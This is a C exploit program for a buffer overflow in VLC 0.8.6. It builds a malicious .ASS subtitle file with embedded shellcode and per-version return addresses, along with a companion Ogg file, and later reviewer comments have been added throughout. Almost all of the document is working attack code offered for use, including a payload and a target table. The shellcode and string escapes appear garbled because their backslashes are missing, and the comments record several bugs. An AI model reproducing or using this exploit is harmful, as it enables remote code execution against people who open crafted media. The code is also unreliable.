# Title : VLC v0.8.6 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
# Published : 2010-01-17
# Author : fl0 fl0w
/*[%]VLC vs 0.6.8 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
[%]Works every time,works on any win32 OS,tested on Windows xp sp2.
[%]My doctor said that I have serious problems, but I think he's full of it
because the voices tell me I'm ok!*/
#include<stdio.h>
#include<string.h>
#include<stdint.h>
#define File "subtitle666.ass" // name of the subtitle file written by buildF
#define OGGfile "openme.ogg" // name of the media file written by oggf
#define IF(x,NULL) if(x==NULL) // null check; the macro parameter is (confusingly) named NULL, the call sites pass the real NULL macro as that argument
#define FOR(i,a,b) for(i=a;i<b;++i) // half-open loop over [a,b); the loop variable is whatever identifier is passed as i (gen_random passes the file-scope int i)
#define WHILE(z) while(z>0) // not used anywhere in this file
#define is_bigendian() ((*(char*)&i)==0) // tests the first byte of whichever `i` is in scope at the expansion site; inside reverseInt that is the unsigned int parameter, so it reports true whenever the argument's lowest-addressed byte is 0 rather than probing host endianness
#define EIP_OFFSET 163852 // offset into b at which buildF places bf; the two SEH offsets below are not referenced in this file
#define SEH_OFFSET 165248
#define NEXTSEH_OFFSET 165244
/*-------------payload and data---------*/
//100% working shellcode
// Payload kept as one concatenated string literal; buildF copies strlen() bytes of it
// into b after the 0x90 filler, so the copy stops at the first NUL byte in the literal.
char vlcshellcode[]=
{
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x3d"
"xbaxb1xd9x83xebxfcxe2xf4xc1x52xf5xd9x3dxbax3ax9c"
"x01x31xcdxdcx45xbbx5ex52x72xa2x3ax86x1dxbbx5ax90"
"xb6x8ex3axd8xd3x8bx71x40x91x3ex71xadx3ax7bx7bxd4"
"x3cx78x5ax2dx06xeex95xddx48x5fx3ax86x19xbbx5axbf"
"xb6xb6xfax52x62xa6xb0x32xb6xa6x3axd8xd6x33xedxfd"
"x39x79x80x19x59x31xf1xe9xb8x7axc9xd5xb6xfaxbdx52"
"x4dxa6x1cx52x55xb2x5axd0xb6x3ax01xd9x3dxbax3axb1"
"x01xe5x80x2fx5dxecx38x21xbex7axcax89x55xc4x69x3b"
"x4exd2x29x27xb7xb4xe6x26xdaxd9xd0xb5x5exbaxb1xd9"
};
// ASS subtitle template: [Script Info] header, one style, and an [Events]
// section whose Dialogue line is left open. buildF writes this literal first
// and appends the generated buffer b directly after it, so the overlong
// Dialogue text is what the parser under test receives.
char data[]=
{
"[Script Info]n"
"; Script generated by Aegisubn"
"; http://www.aegisub.netn"
"Title: Neon Genesis Evangelion - Episode 26 (neutral Spanish)n"
"Original Script: RoRon"
"Script Updated By: version 2.8.01n"
"ScriptType: v4.00+n"
"Collisions: Normaln"
"PlayResY: 600n"
"PlayDepth: 0n"
"Timer: 100,0000n"
"Video Aspect Ratio: 0n"
"Video Zoom: 6n"
"Video Position: 0n"
"[V4+ Styles]n"
"Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encodingn"
"Style: DefaultVCD, Arial,28,&H00B4FCFC,&H00B4FCFC,&H00000008,&H80000008,-1,0,0,0,100,100,0.00,0.00,1,1.00,2.00,2,30,30,30,0n"
"[Events]n"
"Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Textn"
"Dialogue:"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" //165254 junk bytes to cause exception -- only 16 groups are in this literal; the bulk of the filler is the random text generated into b by buildF
};
// Usage banner printed by main when no target index is given.
// NOTE(review): as reproduced here each line ends in a bare `n`, so the
// listing appears to have lost its backslashes; as written these are
// literal characters rather than line breaks.
char banner[]=
{
"******************************************************************n"
" VLC 0.6.8x Buffer overflow exploit(win32 universal) *n"
" *n"
" by fl0 fl0w *n"
"******************************************************************n"
};
// Usage text printed after banner when argc < 2; the expected argument is
// an index into the RET target table (see Targetprint for the listing).
char arguments[]=
{
"---------------------------n"
"Too few args! n"
"sploit.exe [target 1/2/3/4]n"
"---------------------------n"
};
// data + 165254 nop + shellcode + szJMP(strcat)
/*--------global variables----------*/
char b[1000000]; // body of the .ass file: filled by gen_random, patched by buildF, written after data
char c[1000000]; // not referenced anywhere in this file
char d[1000000]; // not referenced anywhere in this file
char f[1000000]; //1402 bytes nop -- not referenced in this file; shadowed by the local FILE *f in buildF
char seh[]="x87x75x40x4B"; // not referenced anywhere in this file
char nseh[]="x38xFAx74x02"; // not referenced anywhere in this file
int i; // file-scope loop index; gen_random uses it through the FOR macro and leaves it equal to len
int input; // target index parsed from argv[1] in main; also used unchecked to index RET
char bf[4]; // the 4 bytes cpy() copies out of the selected RET entry, placed into b by buildF
int t; // file-scope loop index used by Targetprint
/*-------prototypes----------*/
int buildF(); // NOTE(review): declared with no parameters, defined below as buildF(unsigned int retn), and called from main with b (char*) -- the three do not agree
int cpy(unsigned int,char*);
void print(char*);
void gen_random(char*, const int);
unsigned int getFsize(FILE*,char*);
int cpystr(char* dest,int,int); // not called anywhere in this file
int oggf(char* fname);
int Targetprint();
// reverseInt has no prototype here, so its first use in main relies on an
// implicit declaration (invalid since C99); system/atoi/exit/malloc/free/rand
// likewise need <stdlib.h>, which this file does not include.
/*--------ogg file format---------*/
typedef struct aa
{ //28 bytes or 224 bits -- that is the sum of the field widths; with natural alignment the compiler pads before the 64-bit Gp and after St, so sizeof(ogg) is probably 32 rather than 28 unless the struct is packed (confirm for the target compiler)
uint32_t Cp; // Capture pattern - 32 bits
uint8_t Ver; // Version - 8 bits
uint8_t H; // Header type - 8 bits
uint64_t Gp; // Granule position - 64 bits
uint32_t Bsn; // Bitstream serial number - 32 bits
uint32_t Psn; // Page sequence number - 32 bits
uint32_t C; // Checksum - 32 bits
uint8_t Ps; // Page segments - 8 bits
uint8_t St; // Segment table - 8 bits (only one segment-length byte is modelled here; in the Ogg format the table has Ps entries)
}ogg;
/*------targets------------*/
/* Target table: one return address per VLC build plus a human-readable
 * label, terminated by an all-zero sentinel row so iteration can stop
 * without a separate count. */
struct
{
unsigned int eip;
char* etype;
}RET[]=
{
{ .eip = 0x026DFA38, .etype = "VLC 0.8.6 c" },
{ .eip = 0x0263FA38, .etype = "VLC 0.8.6 b,d" },
{ .eip = 0x0267FA38, .etype = "VLC 0.8.6 a" },
{ .eip = 0x0267FA38, .etype = "VLC 0.8.6 b test1" },
{ .eip = 0x02B6FA38, .etype = "VLC 0.8.6 RC1" },
{ .eip = 0, .etype = NULL }
};
/*------main--------*/
/* Entry point. With no argument: clears the console, prints banner, arguments
 * and the target table, then exit(0). Otherwise argv[1] selects a RET row,
 * cpy() stores its 4 address bytes in bf, and the two output files are
 * written. Returns 0 after waiting for a keypress. */
int main(int argc,char* argv[])
{
if(argc<2)
{
system("CLS"); // Windows-only console clear; system() needs <stdlib.h>, which is not included
printf("%s%s",banner,arguments);
Targetprint();exit(0);
}
input=atoi(argv[1]); // NOTE(review): never range-checked. Anything outside 0..4 skips the switch (bf stays zeroed) and still indexes RET below: 5 selects the NULL sentinel, any other value reads past the table
switch(input)
{
case 0:
reverseInt(RET[0].eip); // return value discarded in every case: bf receives the address in host byte order via cpy()
cpy(RET[0].eip,bf);
break;
case 1:
reverseInt(RET[1].eip);
cpy(RET[1].eip,bf);
break;
case 2:
reverseInt(RET[2].eip);
cpy(RET[2].eip,bf);
break;
case 3:
reverseInt(RET[3].eip);
cpy(RET[3].eip,bf);
break;
case 4:
reverseInt(RET[4].eip);
cpy(RET[4].eip,bf);
break;
}
printf("[!]Using : %s retaddressn",RET[input].etype);
buildF(b); oggf(OGGfile); getchar(); // buildF is prototyped with no parameters and defined with an unsigned int; b (char*) is passed and ignored by the definition
return 0;
}
/* Writes the .ass file named by File: random alphanumeric text in b, with
 * bf, ten 0x90 bytes and vlcshellcode placed at EIP_OFFSET, appended after
 * the data template. The retn parameter is never read (main passes b).
 * Returns 0; calls exit(0) if the file cannot be opened. */
int buildF(unsigned int retn)
{
FILE *f=fopen(File,"wb");
IF(f,NULL)
{
print("File .ass error!"); exit(0);}
gen_random(b,165267); /*EIP offset 165267 bytes [EIP][NOP nopoffset=164667 bytes][SHELLCODE nopoffset+nrbytes nop]*/
memcpy(b+EIP_OFFSET,bf,4);
memset(b+EIP_OFFSET+4,0x90,10);
memcpy(b+EIP_OFFSET+4+10,vlcshellcode,strlen(vlcshellcode)); // copies up to the first NUL of the literal
fprintf(f,"%s%s",data,b); // b goes out as a C string, i.e. up to the first NUL byte written into it
free(data); fclose(f); // NOTE(review): data is a file-scope array, not heap memory -- passing it to free() is undefined behaviour
printf("[#]ASS file DONE!n",getFsize(f,File)); // the format has no conversion, so the size is computed but never printed; getFsize ignores the (already closed) handle and reopens by name
return 0;
}
/* Writes a single hard-coded Ogg page header to fname from a heap-allocated
 * ogg struct. Returns 0; calls exit(0) if the file cannot be opened. */
int oggf(char* fname)
{
FILE* g=fopen(fname,"wb");
IF(g,NULL)
{
print("File ogg error");
exit(0);
}
ogg *W666;
W666=(ogg*)malloc(sizeof(ogg)); // allocation result is not checked and the block is never freed
W666->Cp=0x5367674F; // the bytes 4F 67 67 53 = "OggS" when stored little-endian
W666->Ver=0x00;
W666->H=0x02;
W666->Gp=0x00000000;
W666->Bsn=0x000060B8;
W666->Psn=0x00000000;
W666->C=0xA403D2F8;
W666->Ps=0x01;
W666->St=0x1E;
fwrite(W666,sizeof(W666),9,g); // NOTE(review): sizeof(W666) is the size of the pointer, not the struct, and 9 of them (36 bytes on 32-bit, 72 on 64-bit) exceed sizeof(ogg), so this reads past the allocation; one item of sizeof(*W666) looks like what was intended
fclose(g);
printf("[#]OGG file DONE!n",getFsize(g,OGGfile)); // no conversion in the format: the size is computed but not printed
return 0;
}
/* Copies the raw bytes of source into dest in host byte order and returns 4.
 * NOTE(review): the memcpy length is len+1 == 5, one byte more than
 * sizeof(unsigned int) on common ABIs: it reads one byte past source and
 * writes one byte past the 4-byte bf the caller passes. */
int cpy(unsigned int source,char* dest)
{
int len;
len=4;
memcpy(dest,&source,len+1);
return len;
}
/* Writes msg to stdout between a "[*]" prefix and the literal "n" suffix
 * the original format string carries. */
void print(char* msg)
{
fputs("[*]", stdout);
fputs(msg, stdout);
fputs("n", stdout);
}
/* Fills s[0..len) with characters drawn from [0-9A-Za-z] via rand() (no
 * srand() call appears in this file, so the sequence is the same each run)
 * and NUL-terminates at s[len]. The loop runs on the file-scope index i,
 * which is left equal to len on return, exactly as the FOR macro did. */
void gen_random(char *s, const int len)
{
static const char charset[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
const int nchars = (int)(sizeof(charset) - 1);
for (i = 0; i < len; ++i) {
s[i] = charset[rand() % nchars];
}
s[len] = '\0';
}
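/* Returns the size in bytes of the file named gname, found by opening it,
 * seeking to the end and reading the position. The FILE* parameter g is
 * ignored and overwritten, matching the existing callers, which pass an
 * already-closed handle. The stream opened here is closed before returning
 * (the original leaked one handle per call). Calls print() and exit(0) if
 * the file cannot be opened; if fseek/ftell fail the -1 is returned
 * converted to unsigned, as before. */
unsigned int getFsize(FILE* g,char* gname)
{
g=fopen(gname,"rb");
if(g==NULL)
{
print("File error at reading");
exit(0);
}
/* ftell is only meaningful after a successful seek; report -1 otherwise */
long end = (fseek(g,0,SEEK_END) == 0) ? ftell(g) : -1L;
fclose(g);
return (unsigned int)end;
}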
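/* Returns i with its four bytes reversed on a little-endian host (so the
 * value is big-endian in memory), or i unchanged on a big-endian host.
 * Endianness is probed with a local constant instead of the file-scope
 * is_bigendian() macro, whose free identifier `i` bound to this parameter
 * and so tested the argument's low byte rather than the host. The swap is
 * done in unsigned arithmetic so no shift lands in the sign bit; the
 * result is handed back through the original int return type. */
int reverseInt(unsigned int i)
{
const unsigned int probe = 1u;
const int host_is_big_endian = (*(const unsigned char *)&probe) == 0;
if (host_is_big_endian) {
return (int)i;
}
unsigned int swapped = ((i & 0xFFu) << 24)
| (((i >> 8) & 0xFFu) << 16)
| (((i >> 16) & 0xFFu) << 8)
| ((i >> 24) & 0xFFu);
return (int)swapped;
}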
/* Sets len+1 bytes of dest to the byte value str (note the write extends
 * one byte beyond len) and returns len. Not called anywhere in this file. */
int cpystr(char* dest,int str,int len)
{
size_t count = (size_t)len + 1u;
memset(dest, str, count);
return len;
}
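/* Prints every row of the RET target table as label, hexadecimal address
 * and index, stopping at the NULL-labelled sentinel instead of a hard-coded
 * count of 5. Iterates on the file-scope counter t like the original.
 * Returns 0 (the original was declared int but fell off the end). */
int Targetprint(void)
{
print("Targets are:");
for(t=0;RET[t].etype!=NULL;t++)
{
/* %08X matches the unsigned eip field; the original used 0x%d */
printf("[!]%s - [0x%08X] - %dn",RET[t].etype,RET[t].eip,t);
}
return 0;
}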